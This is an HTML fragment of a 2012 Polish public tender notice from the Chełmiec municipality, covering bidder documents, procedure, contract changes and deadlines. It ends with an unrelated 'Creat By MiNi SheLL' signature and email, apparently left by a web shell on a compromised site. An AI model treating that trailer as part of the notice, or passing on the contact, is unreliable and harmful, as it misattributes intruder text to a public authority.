<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty tylko i wyłącznie w sytuacji gdy konieczność wprowadzenia takiej zmiany wynikać będzie z sytuacji której nie można było wcześniej przewidzieć lub gdy zmiana ta będzie korzystna dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chelmiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Papieska 2, 33-395 Chełmiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2012 godzina 09:45, miejsce: ul. Papieska 2, 33-395 Chełmiec, dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com